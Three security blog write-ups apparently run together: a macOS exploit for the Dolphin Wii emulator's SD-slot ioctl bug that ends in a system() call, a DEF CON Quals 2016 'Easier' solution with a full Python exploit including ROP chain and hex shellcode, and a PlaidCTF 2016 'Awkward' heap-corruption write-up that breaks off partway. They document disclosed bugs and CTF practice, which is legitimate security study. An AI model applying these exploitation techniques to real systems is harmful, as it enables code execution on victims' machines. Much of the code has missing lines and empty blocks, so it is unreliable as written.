Exploiting Dolphin – Part 1

Dolphin is a Wii emulator, and a consistent source of interesting technical problems. In the interests of learning more about Dolphin, Wii, PowerPC, and exploitation, I discovered a handful of bugs, and created an ISO file that can run arbitrary code on the host, portably and reliably. This has been an interest of mine since I spent some time exploiting a partial GameCube emulator in the last Defcon CTF finals, and I decided to actually explore it following a tweet from a Dolphin developer.

To be clear, Dolphin is not a sandbox, and is not designed to be secure. You should not use it to emulate software from untrusted sources. Piracy is a very good way to get yourself hacked. If you run something in Dolphin you should understand that it can do anything on your computer. These bugs will be fixed, but there will be plenty of other bugs in the future.

These issues are not “vulnerabilities”, it’s just a collection of interesting tricks that allow games running on Dolphin to execute arbitrary code. I do call it “exploitation”, because the same techniques can work on software which actually has security requirements.

Anyway, enough disclaimers, let’s dig in. In Part 1, I’ll show how to make a 100% reliable exploit for Dolphin on macOS, which is portable to every version containing a single, simple bug.


Enough three-letter initialisms? Let’s start with some definitions. (I’ve included links to the WiiBrew wiki, which was a valuable source.)

IOS is the operating system that the Wii provides to games running on it. It runs on a separate ARM coprocessor in the Wii. This provides a variety of services, for example allowing games to read and write files, and communicate over the network.

IPC stands for inter-processor communication, and is the means by which the PowerPC processor running the game code communicates with IOS. This is implemented using a number of memory-mapped I/O registers.

HLE stands for high-level emulation. Instead of requiring a copy of IOS to be fully emulated, Dolphin provides high-level (C++) implementations of all the functionality that IOS usually provides to games.

This provides a considerable attack surface, and is where I began my search for interesting bugs. After a little exploring, I came across the following code (abbreviated):

CWII_IPC_HLE_Device_sdio_slot0::IOCtl(u32 _CommandAddress)
  u32 Cmd = Memory::Read_U32(_CommandAddress + 0xC);
  u32 BufferIn = Memory::Read_U32(_CommandAddress + 0x10);
  u32 BufferOut = Memory::Read_U32(_CommandAddress + 0x18);
  switch (Cmd)
    u32 reg = Memory::Read_U32(BufferIn);

    if (reg >= 0x200)
      WARN_LOG(WII_IPC_SD, "IOCTL_READHCR out of range");

    u32 val = m_Registers[reg];
    INFO_LOG(WII_IPC_SD, "IOCTL_READHCR 0x%08x - 0x%08x", reg, val);

    // Just reading the register
    Memory::Write_U32(val, BufferOut);
  // ...
  // ...

This code looks great, it’s bounds checked and everything. The catch, of course, is in the definition:

class CWII_IPC_HLE_Device_sdio_slot0 : public IWII_IPC_HLE_Device
  // ...
  u32 m_Status;
  u32 m_BlockLength;
  u32 m_BusWidth;

  u32 m_Registers[0x200 / 4];

  File::IOFile m_Card;
  // ...

The classic byte/word mixup allows reading from anywhere up to index 511 in a 128 element array. Better still, there’s a IOCTL_WRITEHCR implemented in the same method with the same bug, allowing memory corruption. (To my surprise, this bug was introduced by respected exploit writer comex in September 2013.)

It took me a lot of work to create an ISO file that reproduce this bug, using only Python, PyCrypto, and a PowerPC toolchain, and I learned a lot of interesting lessons. But after thoroughly reinventing a number of wheels, the proof-of-concept was only a few lines:

  int slot0 = open("/dev/sdio/slot0", MODE_RW);

  // overwrite the low 32-bits of the File::IOFile
  u32 input[5] = {129, 0, 0, 0, 0x41414141};
  ioctl(fd, IOCTL_WRITEHCR, &input, sizeof input, 0, 0);

  // crash by attempting to read from the File::IOFile
  u8 out[8];
  slot0_read_multiple_block(fd, &out, 0, sizeof (out));

ASLR in Dolphin

Dolphin avoids randomised addresses in several places for a variety of reasons. In recent versions, the binary is loaded at a fixed location below 0x80000000 (2GB) so that certain x86 instructions emitted by the JIT can access it. The drawback of using this memory is that it can change significantly every time the program is recompiled or the source changes. But this technique is very useful if we know the exact version we’re exploiting and don’t need to be portable.

Also on macOS and Linux, the virtual memory of the emulated console is mapped at a fixed address (0x2300000000). This is part of the “fastmem” optimisation, where Dolphin uses a 16GB range of the 64-bit address space to represent memory in the same layout as is seen by the 32-bit processor in the Wii. (This is an oversimplification, but it’s close enough for our purposes.)

#ifdef _WIN32
 // 64 bit
 u8* base = (u8*)VirtualAlloc(0, 0x400000000, MEM_RESERVE, PAGE_READWRITE);
 VirtualFree(base, 0, MEM_RELEASE);
 return base;
 // Very precarious - mmap cannot return an error when trying to map already used pages.
 // This makes the Windows approach above unusable on Linux, so we will simply pray...
 return reinterpret_cast<u8*>(0x2300000000ULL);

This is nice and predictable for attacks which required arbitrary data at a known location. On Windows there’s no deliberate randomisation, but it’s not 100% predictable (due to some other factors), so we can’t write a 100% reliable exploit this way.

Even with full ASLR, the bug described in the previous section allows us to leak some data from the heap, potentially bypassing ASLR. But for now I’ll focus on using the fastmem region at 0x2300000000 to exploit macOS.

Corrupting an IOFile

Now we have two options, corrupt the following member of the structure (the IOFile), or corrupt the following heap data. There’s a lot more heap data to chose from, but as the CWII_IPC_HLE_Device_sdio_slot0 class is allocated only once during initialisation, we don’t have much control over the following data, and it will be different on different platforms, and change randomly on some platforms, so the IOFile is a much more appealing option.

It has only has two members we can corrupt:

class IOFile : public NonCopyable
// ...
  std::FILE* m_file;
  bool m_good;

It turns out there’s exactly one pointer we can overwrite. At first glance this seems hard to exploit, but it turns out that the FILE structure is responsible for managing input and output buffers, and is extremely amenable to building an arbitrary memory read/write primitive.

Let’s take a look at how the IOFile is used by slot0 (abbreviated again):

u32 CWII_IPC_HLE_Device_sdio_slot0::ExecuteCommand(u32 _BufferIn, u32 _BufferInSize,
                                                   u32 _rwBuffer, u32 _rwBufferSize,
                                                   u32 _BufferOut, u32 _BufferOutSize)
  // The game will send us a SendCMD with this information. To be able to read and write
  // to a file we need to prepare a 0x10 byte output buffer as response.
  struct Request req = Memory::ReadRequest(_BufferIn);
  u32 ret = RET_OK;
  switch (req.command)
  // ...
    if (m_Card)
      u32 size = req.bsize * req.blocks;
      if (!m_Card.Seek(req.arg, SEEK_SET))
        ERROR_LOG(WII_IPC_SD, "Seek failed WTF");
      if (m_Card.ReadBytes(Memory::GetPointer(req.addr), size))
        DEBUG_LOG(WII_IPC_SD, "Outbuffer size %i got %i", _rwBufferSize, size);
        ERROR_LOG(WII_IPC_SD, "Read Failed - error: %i, eof: %i",
          ferror(m_Card.GetHandle()), feof(m_Card.GetHandle()));
        ret = RET_FAIL;
    Memory::Write_U32(0x900, _BufferOut);
  // ...

The Seek and ReadBytes translate pretty much directly to fread and fseek, which are part of the C standard library, implemented by Libc on macOS. You can download the source from opensource.apple.com.

The FILE structure is pretty complicated, but there are a few things to note. First, there are function pointers, which we could use to get control of RIP. However, we don’t know any fixed address that’s safe to call, so we must also note the flags, which we can use to prevent the function pointers from being used, while constructing an arbitrary read.

The following is the (again abbreviated) structure definition:

typedef struct __sFILE {
 unsigned char *_p; /* current position in (some) buffer */
 int _r; /* read space left for getc() */
 int _w; /* write space left for putc() */
 short _flags; /* flags, below; this FILE is free if 0 */
 short _file; /* fileno, if Unix descriptor, else -1 */
 struct __sbuf _bf; /* the buffer (at least 1 byte, if !NULL) */

 /* operations */
 void *_cookie; /* cookie passed to io functions */
 int (*_close)(void *);
 int (*_read) (void *, char *, int);
 fpos_t (*_seek) (void *, fpos_t, int);
 int (*_write)(void *, const char *, int);

 /* separate buffer for long sequences of ungetc() */
 struct __sFILEX *_extra; /* additions to FILE to not break ABI */
 fpos_t _offset; /* current lseek offset (see WARNING) */

#define __SRD 0x0004 /* OK to read */
#define __SWR 0x0008 /* OK to write */
#define __SRW 0x0010 /* open for reading & writing */
#define __SOPT 0x0400 /* do fseek() optimisation */
#define __SOFF 0x1000 /* set iff _offset is in fact correct */

Let’s perform an arbitrary read. First, we need to make sure we hit the “fseek() optimisation” path that doesn’t call the _seek function pointer, and then have enough data available in the buffer that it doesn’t need to call the _read function pointer. We can do this as follows:

  • Set the __SOPT and __SOFF flags to avoid calling seek.
  • Set the _seek function pointer to non-NULL to allow seeking.
  • Set the __SRD flag to allow reading.
  • Make the _offset and _r fields are greater than the read size.
  • Make the _p and _bf._base fields point to the source location for the read.
  • The _extra pointer must point to valid memory, for the lock.

All in all the function ends up looking like this:

static void slot0_osx_read(int fd, void *out, u64 hostaddr, u32 size) {
 osx_FILE file;
 memset(&file, 0, sizeof file);

 osx_FILEX extra;
 memset(&extra, 0, sizeof extra);

 file._extra = address_to_host(&extra);

 file._flags = OSX_SOPT | OSX_SOFF | OSX_SRD;
 file._seek = 1; // non-null

 file._p = hostaddr;
 file._bf._base = hostaddr;

 file._offset = size + 1;
 file._r = size + 1;

 // replace the FILE* to point to our data
 u64 saved_fileptr = slot0_read_fileptr(fd);

 slot0_write_fileptr(fd, address_to_host(&file));

 slot0_read_multiple_block(fd, out, 0, size);

 // restore
 slot0_write_fileptr(fd, saved_fileptr);

There’s an interesting problem of endian that I haven’t mentioned. Because the PowerPC architecture our code is running on is big-endian, and the x86 architecture Dolphin is running on is little-endian, we need to swap every field in the structure. I borrowed a trick from LLVM, which uses C++ operator overloading to transparently do endian conversions, so the code above is correct – it’s just that the fields are declared as host_u32 and host_ptr types in the structure definition, not int and unsigned char * as in the Libc source code.

Finding System

We’ll finish the exploit by calling system, but first we have to find it. system is a function in libc, so we can start by finding libc. Fortunately, we know where the original FILE object is (because we can leak it using the out of bounds read), and so we can read out the pointers to the true implementation of the _read function, which is within Libc.

We can then search backwards from this point to find the Mach-O header (marked by the magic number 0xFEEDFACF at the start of a page). And finally, we just need to do exactly what dyld does, parse the Mach-O header, find the export trie and lookup the string _system. Fortunately you can find the source at opensource.apple.com, which makes things a bit easier, but it still takes quite a lot of code.

The implementation is shown in the code linked below.

Running code

Now we just need to call system. We’ve gone to great lengths to avoid calling _seek, but it’s actually a really good technique, because _seek is called with _cookie as the first argument:

ret = (*fp->_seek)(fp->_cookie, offset, whence);

So now we know where system is, we can invoke it with an arbitrary string as follows:

file._cookie = address_to_host("open -a Calculator");
file._seek = system_ptr;
file._flags = 0;
slot0_write_fileptr(slot0, address_to_host(&file));
slot0_read_multiple_block(slot0, &ignored, 0x1234, sizeof ignored);
slot0_write_fileptr(slot0, saved_fileptr);

When Dolphin attempts the read, it will call system and the shell command will run.

After all this the runtime is stable, so it could easily be patched into a pirated game. (Don’t pirate software, even emulated software. With Dolphin, and most other emulators, you’d be taking exactly the same risk as pirating native games, which is just a terrible idea.)

Final Notes

This exploit works on Dolphin 3.5-2313 through to Dolphin 5.0-1296 on OS X (I didn’t test them all, but a pretty representative sample). It hopefully illustrates how carefully choosing corruption targets and techniques can lead to very reliable and portable exploits.

There are a lot of things I didn’t cover, but I hope it gave some insight into Dolphin, and macOS’s C library implementation.

The full code for the macOS exploit is on gist.github.com – if you have any questions, let me know. The hard part is arguably setting up the build environment and generating a Wii disc, but there are plenty of other resources that can help with that.

The patches for the other bugs I disclosed are in PR #4447. Thanks to JosJuice for fixing the bugs quickly.

In Part 2, I’ll explain how to exploit this on Windows, turn the FILE* overwrite into an arbitrary write as well, and look at another information-leak bug.

Def Con Quals 2016 – Easier [Pwnable]

Easier has the dubious honor of being the most frustrating CTF challenge I have completed to date. It was the second hardest challenge in the CTF, according to the dynamic scoring system LegitBS used. (And the hardest problem that my team, 9447, solved.)

The challenge presented a fairly opaque interface, sending the user four random numbers on start up, and accepting four numbers in return. I reversed this pretty extensively in IDA and WinDbg, figuring out that it was performing modular exponentiation and finding all the parameters, only to figure out that the result is completely ignored as long as all your response values are greater than 1 (otherwise it exits).

So, a lot of time wasted, but now we get to it reading more input. It would read two numbers from the user perform a cryptographic-looking operation on them. I reversed this to the following C code:

    void do_input(unsigned *buffer, unsigned count) {
        for (unsigned i = 0; i < count; i++) {
        unsigned lookup[4] = {1, 2, 3, 4};
        for (unsigned i = 0; i < count; i += 2) {
            unsigned value = 0x7CBF26C0;
            unsigned v1 = buffer[i];
            unsigned v2 = buffer[i+1];
            for (unsigned j = 0; j < 64; j++) {
                 v2 -= (value + lookup[(value >> 11) & 3]) ^
                      (v1 + ((v1 << 4) ^ (v1 >> 5)));
                value += 0x160D0365;
                v1 -= (value + lookup[value         & 3]) ^
                      (v2 + ((v2 << 4) ^ (v2 >> 5)));
            buffer[i] = v1;
            buffer[i+1] = v2;

I tried to transcribe this to z3 to find the inverse, painstakingly debugged an issue where using v2>>5 instead of LShR(v2,5) caused z3 to hang indefinitely, and I could finally send commands! My first successful use of z3 in a CTF!

As soon as I started reversing the commands, however, I immediately found that command number 2 called a function that performed the inverse operation all along. I transcribed that C code to Python, hung my head in shame, and moved on with the challenge.

To explain the commands, I will annotate the source LegitBS kindly release on GitHub (DefconChal2.cpp, I will however note that lines 91 to 93 are definitely not in the binary (and might have made things a lot easier).

In the end I used commands 1, 2, and 5 to write the exploit. But the seemingly endless collection of useless or painfully hard to use bugs is worth noting (starting with the “does-nothing” crypto initialization).

  // allocates room for 128 buffers, even though bufferPointer is
  // limited to 63 (this makes a reference to bufferPointer*2 in
  // command 8 safe, though)
  uint32_t **buffers = (uint32_t **)halloc(512);
  uint32_t bufferPointer = 0;
  while (1) {
    uint32_t buf[2] = {0};
    int newSize;
    readn(buf, 2, agreeKey);
    newSize = buf[1];
    uint32_t *toUse;
    if (bufferPointer > 63) {
    switch (buf[0]) {
    case 1:
      // newSize is signed, so we could allocate -4 if we wanted,
      // or smaller numbers to get a possibly-interesting NULL
      // pointer dereference. Of course, this would "scanf" pretty
      // much indefinitely.
      if (newSize < 2048) {
        toUse = (uint32_t *)halloc(newSize + 4);
      } else {
      toUse[0] = buf[1];
      readn(&toUse[1], buf[1] / 4, agreeKey);
      buffers[bufferPointer++] = toUse;
    case 2:
      // Send back the buffer
      if (buf[1] < 64 && buffers[buf[1]] != 0) {
        writen(&(buffers[buf[1]][1]), buffers[buf[1]][0] / 4, agreeKey);
    case 3:
      // Free a buffer
      if (buf[1] < 64 && buffers[buf[1]] != 0) {
        buffers[buf[1]] = 0;
      } else {
    case 4: {
      // This looks like it leaks the address of ntdll, but "hm += 4" adds
      // 4 * sizeof (HMODULE*) = 16 bytes, so it corrupts the heap. It
      // also doesn't store the new allocation in the "buffers" array, so
      // it's useless.
      HMODULE *hm = (HMODULE *)halloc(sizeof(HMODULE) + 4);
      *(uint32_t *)hm = (uint32_t)sizeof(HMODULE);
      hm += 4;
      *hm = LoadLibrary(L"ntdll.dll");
    } break;
    case 5: {
      // This is the only crazy one I could use. "b1" can be buffer 0 (the
      // first buffer allocated), or buffer 64 (see command 8?)
      int b1 = buf[1] & 64;
      int b2 = (buf[1] >> 8) & 63; // any buffer 0 through 63
      if (buffers[b1] == NULL || buffers[b2] == NULL) {

      // copy using the length from b1
      memcpy(&buffers[b1][1], &buffers[b2][1], buffers[b1][0]);

      // Set the length of b1 to the length of b2, potentially growing the
      // buffer. This has a lot of advantages.
      buffers[b1][0] = buffers[b2][0];

      // Free the second buffer without removing it from the list (so you
      // could double-free it, use the free list pointers as buffer length,
      // etc.)
    case 6:
      // This looks like a nice arbitrary read, because it doesn't check
      // the bounds of "buffers". Except there's no way to get the
      // result - it just leaves it on the stack. And it calls
      // "readn(..., 1, ...)" which uses the uninitialized memory in
      // offset[1] which makes the chosen index basically random.
      uint32_t offset[2];
      uint32_t *myBuf = buffers[buf[1]];
      char toEnc[8] = {0};
      readn(offset, 1, agreeKey);
      if (offset[0] < myBuf[0] / 4) {
        sprintf(toEnc, "%08x\n", myBuf[offset[0] + 1]);

    } break;
    case 7: {
      // This looks like a nice arbitrary write, but again, it uses
      // readn(..., 1, ...), twice. Maybe z3 could have solved the second
      // one, but the local values seemed to contain random stack
      // addresses when I tried it.
      uint32_t offset[2];
      uint32_t *myBuf = buffers[buf[1]];
      readn(offset, 1, agreeKey);
      if (offset[0] < myBuf[0] / 4) {
        readn(&myBuf[offset[0] + 1], 1, agreeKey);
    } break;
    case 8: {
      // This makes the same mistake as case 4 of adding
      // 4*sizeof(SYSTEM_INFO) and even worse, stores the wrong pointer
      // into the buffers array (where it could be freed - the bugs are
      // endless). It also uses bufferPointer*2 as the index, which is
      // interesting because it's the only way we could write to
      // buffers[64] (which we can access in command 5). (As noted above,
      // the array is big enough that this isn't out-of-bounds.)
      uint32_t *val;
      LPSYSTEM_INFO lpinfo = (LPSYSTEM_INFO)halloc(sizeof(SYSTEM_INFO)+4);
      val = (uint32_t *)lpinfo;
      lpinfo += 4;
      val[0] = sizeof(SYSTEM_INFO);
      buffers[bufferPointer * 2] = (uint32_t *)lpinfo;
    } break;

Okay, so I trust you read cases 1, 2, and 5. The first trick I found was to leak a lot of heap memory. This works (at a guess) by using the free list pointer to read out of bounds:

send_pair(1, 3)  # allocate a buffer with zero items
send_pair(6, 0)  # free the buffer, without removing it from the list
send_pair(2, 0)  # read the buffer

(At this point it’s worth noting another bug: in the “read the buffer” command, the first two DWORDs are encoded, and every subsequent DWORD is transmitted as it. Useless, but confusing.)

This would dump a large amount of heap memory, then crash. I used WinDbg’s !heap command to try to understand, and I think this is because the allocation landed in an LFH region in the heap somewhere early on. It was useful because this leaked out some recognisable pointers into the binary, making it possible to figure out the remote ASLR slide. (It’s worth mentioning that Windows pretty much only randomizes module addresses once per boot, so the location of the binary was the same every time I connected to the same server).

The bug I planned to exploit was in command 5, which can grow the buffer. This gives you an arbitrary out-of-bounds heap read and write:

send_pair(1, 3)            # allocate a buffer with zero items
send_pair(1, 2040)         # allocate a buffer with 2040 items
send_sequence([0] * 2040)
send_pair(6, 1 << 8)       # set the length of the first buffer to 2040
send_pair(2, 0)            # read the buffer
send_pair(1, 2040)         # allocate a new buffer with 2040 items
send_sequence([0x41414141] * 2040)
send_pair(6, 2 << 8)       # copy the data to the buffer this time

Now, my master plan was to allocate the first buffer immediately before “buffers” array on the heap and control it. I had an EC2 instance set up to try to replicate the conditions and I tried a few different allocation sizes and eventually got this working. Nice!

Fortunately, I had to foresight to try to reproduce this result on the remote server. It didn’t work. I still don’t know why.

However, I did notice a new pointer into the binary that I hadn’t seen before when I used an allocation size of 24. This was a pointer to a vtable, which IDA recognised as that of “std::locale::_Locimp”, some part of the statically linked C++ runtime code. Unfortunately, I couldn’t see this locally, but as it was my only lead, I decided to try exploiting it remotely, with no way to debug it.

But how could I make a fake vtable? I needed to figure out the address of my data on the heap. Item zero gave a read-write size of 2040, but if I allocated another buffer after it (in the randomized LFH), I could modify its length to be an arbitrary value, leaking enough of the heap to reveal the buffers array. From here, I could find one of my buffers that contained a vtable. I filled a buffer with the pointer to the following gadget:

 .text:00401850 push offset a08x08x08x08x ; "%08x %08x %08x %08x\n"
 .text:00401855 call printf

And then changed the vtable pointer to point to it. Nothing happened. Then I sent an invalid free command and suddenly it printed the four hex values! The first one printed was the return address, which I figured out was inside an _atexit handler. I had eip control!

From here, painstaking step by painstaking step I wrote my ROP chain without a debugger. One interesting note is the pivot I used:

 les esp, ptr [eax] ; pop esi ; pop ebp ; ret

Not being familiar with the les instruction(“Load Far Pointer”) I had assumed it loaded a pointer from the es segment. This was a mistake (and a very tricky mistake to debug blindly). It turns out it loads a 48-bit pointer from memory, with the high 16 bits going into the es segment register. I found the value of es on my Windows test server, and corrected my fake vtable to be:

 vtable = [
    rop_chain_address, # value for esp
    0x2B,              # value for the "es" segment
    slide(0x00405b04), # les esp, ptr [eax] ; pop esi ; pop ebp ; ret

From here, I used my ROP chain to call the “writen” function and dump out the address of functions in kernel32 (from easier’s imports). I then called VirtualAlloc to protect some shellcode and returned into it.

Victory, right?

Nope, just to add to the frustration, I couldn’t manage to open the flag file. I tried using WinExec to run commands (I don’t think I got any output). I tried using CreateFileA, and debugged it using GetLastError and printf (I was initially passing the wrong arguments). I eventually called GetProcAddress(LoadLibraryA(“msvcrt”), “system”) and managed to run commands. echo hello worked, but dir and type flag.txt both output Access denied. I ran GetCurrentDirectoryA(…) and printed the result, and eventually figured out the winning command to pass to system:

type "C:\Users\Administrator\Desktop\Defcon Chal\key.txt"

Was this necessary? In hindsight I imagine not, but it was what finally worked.

Many thanks to LegitBS for the most incredibly frustrating challenge I have ever done. I hate thing2 too 🙂


The slightly-cleaned-up code is below. Note that it contains a few hardcoded addresses, which were found using different ROP chains or shellcodes.

import socket
import struct
import random
import string
import time
import sys

shellcode = '648b250400000081ec00020000e83a000000747970652022433a5c55736572735c41646d696e6973747261746f725c4465736b746f705c446566636f6e204368616c5c6b65792e7478742200be30b71b75ffd6be5018eb00ffe6'.decode('hex')

# align to 8 bytes
while len(shellcode) % 8: shellcode += '\0'
shellcode_dwords = [struct.unpack_from('I', shellcode, i)[0] for i in range(0, len(shellcode), 4)]

# usual boilerplate
ADDRESS = ('easier_55605f781f413a2b699377ced27617f0.quals.shallweplayaga.me', 8989)

sock = None
def read_byte():
    buf = sock.recv(1)
    if not buf:
        raise EOFError
    return buf

def read_n(n):
    s = ''.join(read_byte() for i in range(n))
    if VERBOSE:
        print '<', `s`
    return s

def read_until(sentinel='\n'):
    s = ''
    while not s.endswith(sentinel):
        b = read_byte()
        if VERBOSE:
        s += b
    return s

def send(s):
    if VERBOSE:
        print '>', `s`

# specific code
def encode(v1, v2):
    value = 0
    lookup = [1,2,3,4]
    for i in range(64):
        v1 = (v1 + ((value + lookup[value & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
        value -= 0x160D0365;
        v2 = (v2 + ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
    return v1, v2

def decode(v1, v2):
    value = 0x7CBF26C0
    lookup = [1,2,3,4]
    for i in range(64):
        v2 = (v2 - ((value + lookup[(value >> 11) & 3]) ^ (v1 + ((v1 << 4) ^ (v1 >> 5))))) & U32
        value += 0x160D0365
        v1 = (v1 - ((value + lookup[value         & 3]) ^ (v2 + ((v2 << 4) ^ (v2 >> 5))))) & U32
    return v1, v2

def send_pair(v1, v2):
    v1, v2 = encode(v1, v2)
    send(str(v1) + 'x ' + str(v2) + 'x\n')

def send_sequence(l):
    l = l[:]
    n = len(l) & 1
    if n:
    for i in range(0, len(l), 2):
        l[i], l[i+1] = encode(l[i], l[i+1])
    if n:
        l = l[:-1]
    send(' '.join('%dx' % i for i in l) + '\n')

def allocate_item(size, data):
    send_pair(1, size)

def read_item(item):
    send_pair(2, item)
    r = [int(i,16) for i in read_until('\n').split()]
    if len(r) >= 2:
        r[0], r[1] = decode(r[0], r[1])
    return r

def free_item(item):
    send_pair(3, item)

def operation_5(zero_or_40, src_idx):
    send_pair(5, zero_or_40 | (src_idx << 8))

def try_to_win():
    global VERBOSE
    global sock
    print ADDRESS

    sock = socket.create_connection(ADDRESS)

    # do the pointless handshake
    values = read_until('\n').split()
    send('4 5 6 7\n')

    # this size allocates in an LHF block preceeding the vtable on the remote
    # server
    size = 24
    current_item = 0
    allocate_item(size, [2] * (size/4)); current_item += 1

    # allocate the largest item we can
    grow_item = current_item
    allocate_item(2040, [2] * (2040/4)); current_item += 1

    # allocate more items in the same LFH block, so we can grow one of them
    # to leak even more heap memory
    for i in range(19):
        allocate_item(24, [0x12345678,current_item,0,0,0,0]); current_item += 1

    # copy 24 bytes to our first allocation, and set its size to 2040
    operation_5(0, grow_item)

    # read out the 2040 bytes
    original = read_item(0)

    # try to find the vtable
    vtable_index = None

    for i, v in enumerate(original):
        if (v & 0xFFFF) == 0xc134:
            image_base = v - 0x1c134
            print hex(image_base)
            vtable_index = i
            print 'found vtable at offset', i
        # just retry
        print 'no vtable! :('
        return False

    # try to find one of our other buffers
    for i, v in enumerate(original):
        if i + 1 < len(original) and v == 0x12345678:
            leak_item_index = i-1
            leak_item_id = original[i+1]
            print 'found item', original[i+1], 'at index', leak_item_index
        print 'no item'
        return False

    # grow our leak item so we can read 9KB of heap memory
    update = original[:]
    update[leak_item_index] = 0x2400

    # we write to our 2040 byte window by allocating a new item
    # and doing operation 5 again. this copies 2040 bytes.
    update_item = current_item
    allocate_item(2040, update); current_item += 1

    operation_5(0, update_item)

    # leak 9KB of memory for the first time.
    # this should include the array of pointers to our buffers, which will
    # allow us to find the address of our buffers and construct complex data.
    leak_1 = read_item(leak_item_id)
    print ' '.join('%x' % i for i in leak_1)

    # allocate the shellcode
    allocate_item(len(shellcode_dwords)*4, shellcode_dwords); current_item += 1

    # find the pointer to the shellcode by leaking 9KB again, and looking at
    # the changes made to the memory
    leak_2 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_1, leak_2)):
        if i == 0 or i == len(leak_1) - 1: continue
        if leak_1[i-1] != 0 and leak_2[i-1] != 0 and a == 0 and b != 0 and leak_1[i+1] == 0 and leak_2[i+1] == 0:
            print 'index is', hex(i)
            my_string_addr = leak_2[i] + 4
            print 'my_string_addr @ ' + hex(my_string_addr)
        print 'couldnt find my_string_addr'
        return False

    # generate our rop chain, using the shellcode address

    def slide(x):
        return x - 0x400000 + image_base

    # (unused) gadget for debugging
    definitely_printf_4 = slide( 0x401850 )

    # (unused) function for dumping memory
    # I used this, combined with some "pop" gadgets to dump the import
    # pointers and find the kernel32 base address.
    write_function = slide( 0x40F13A )

    # just a ret instruction
    rop_nop = slide( 0x40F21B )

    # This could be calculated at the time, but once-per-boot ASLR is too
    # convenient not to take advantage of.
    kernel32_base = 0x770e0000

    virutalalloc = 0x6B818B90-0x6B810000+kernel32_base

    rop_chain = [
        # make some room for the stack, so it won't corrupt the heap
        rop_nop, # esi
        rop_nop, # ebp
        rop_nop, # first gadget

    # allocate the rop chain
    while len(rop_chain) < (0x100/4):
    assert len(rop_chain) == (0x100/4)

    allocate_item(0x100, rop_chain); current_item += 1

    # find the rop chain as before
    leak_3 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_2, leak_3)):
        if i == 0 or i == len(leak_2) - 1: continue
        if leak_2[i-1] != 0 and leak_3[i-1] != 0 and a == 0 and b != 0 and leak_2[i+1] == 0 and leak_3[i+1] == 0:
            print 'index is', hex(i)
            my_rop_chain = leak_3[i] + 4
            print 'my_rop_chain @ ' + hex(my_rop_chain)
        print 'couldnt find my_rop_chain'
        return False

    # create the vtable, using the pointer to the rop chain
    vtable = [
        0x2B,               # value for the "es" segment
        slide(0x00405b04),  # les esp, ptr [eax] ; pop esi ; pop ebp ; ret

    while len(vtable) < (0x40/4):
    assert len(vtable) == (0x40/4)

    # allocate the vtable
    allocate_item(0x40, vtable); current_item += 1

    # find the vtable as before
    leak_4 = read_item(leak_item_id)

    for i, (a,b) in enumerate(zip(leak_3, leak_4)):
        if i == 0 or i == len(leak_3) - 1: continue
        if leak_3[i-1] != 0 and leak_4[i-1] != 0 and a == 0 and b != 0 and leak_3[i+1] == 0 and leak_4[i+1] == 0:
            my_vtable = leak_4[i] + 4
            print 'my_vtable @ ' + hex(my_vtable)
        print 'couldnt find my_vtable'
        return False

    # now we can just corrupt the existing vtable to point to our fake one
    VERBOSE = True
    update[vtable_index] = my_vtable
    update_item = current_item
    allocate_item(2040, update); current_item += 1

    operation_5(0, update_item)

    # invoke exit, to trigger the atexit handler to trigger the virtual call

    # read forever, dumping output to stderr (hangs)

while True:
    # hangs if successful

PlaidCTF 2016 – Awkward [Pwnable 600]

Awkward was an exploitation challenge, providing a pretty serious “awk” like interpreter, with a variety of different bugs.

I used IDA and Hex-Rays extensively to reverse it.

After a bit of reversing, I got it running simple programs like this:

FINISH { printf "%d", 1; }

And, mostly by lucky guess found the information leak vulnerability, where printf failed to check types, allowing leaking heap addresses with:

 printf "%x", "string";

And reading strings from arbitrary addresses with:

 printf "%s", 12345678;

This was all I had for probably 10 hours. I reversed most of the interpreter, the hash-map, deeply investigated some weird behaviour with regards to string splitting, field-separators and string joining. Nothing. Eventually I found another (probably unintended) information leak vulnerability, which looked like:

 "string"; x = y;

If y was an uninitialized variable, x would become the address of “string”.

Finally, and somewhat apprehensively, I embarked on reversing the last remaining component: the regex engine. Finally, I found the corruption bug – when parsing character sets ([abc] notation), the byte values were being sign-extended before writing bits into a bitmap.

Screen Shot 2016-04-18 at 10.23.37 PM.png

(v24 is an int, from a sign-extended character)

This allowed setting bits before the start of the bitmap using bytes 80 to FF. This allows only a handful of fields to be corrupted. Long story short, there was a “next” pointer field which was initialised to NULL earlier in the structure. I could write into it bit-by-bit, and as long as it was the last thing in the regex it would keep the new value (otherwise it would be overwritten by a real next value).

I took some notes on which byte values mapped to which bits, just by trying it and looking at the crash address in gdb, and eventually figured out the rules. I probably should have used a mathematical approach to calculate it, but sometimes it’s safer to just trust what you can see:

 # NOTE: 0xC0 -> 1
 # NOTE: 0xB9 -> 2
 # NOTE: 0xBA -> 4
 # NOTE: 0xBB -> 8
 # NOTE: 0xBC -> 10
 # NOTE: 0xBF -> 80
 # NOTE: 0xC8 -> 100
 # NOTE: 0xC1 -> 200
 # NOTE: 0xC2 -> 400
 # NOTE: 0xC7 -> 8000

I combined it into the following python for setting an arbitrary address:

 target = 0x12345678
 lookup = ([0xC0] + range(0xB9, 0xC0) + [0xC8] + range(0xC1, 0xC8) +
           [0xD0] + range(0xC9, 0xD0) + [0xD8] + range(0xD1, 0xD8))
 chrs = ''
 for i in range(0, 32):
     if target & (1 << i):
         chrs += chr(lookup[i])
 print 'print ' + str(i) + ', "hello" ~ /[' + chrs + ']/;'

I spent a few hours poking around different options for what to confuse with a “next” node before realising that if the first byte is a safe value it doesn’t crash and just frees the provided address.

I spent longer pondering what I should free before deciding on the “fields” array (pretty much the only array the code can access). This is an array of char* that is initialised by splitting the input line, but you can reallocate it to be a pretty arbitrary size by assigning to it. You can then write pointers to arbitrary strings into it. Pretty convenient, right?


I found the address of the fields array by leaking some strings on either side of it in the heap and adding a constant offset:

 str = "aaaabbbbccccddddeeeeffffgggghhhh";
 # duplicate the string and get its address a few times
 str; q = z;
 str; r = z;
 str; s = z;
 str; t = z;
 # reallocate fields array
 $128 = "1";
 # get one after it for reference
 str; u = z;
 # dump the addresses
 printf "%x\n%x\n%x\n%x\n%x\n", q, r, s, t, u;
 printf "%x\n%x\n%x\n%x\n", r-q, s-r, t-s, u-t;
 x = t + 112;
 printf "fields array: %x\n", x;

I then rewrote my arbitrary-free to use awk to construct the regex:

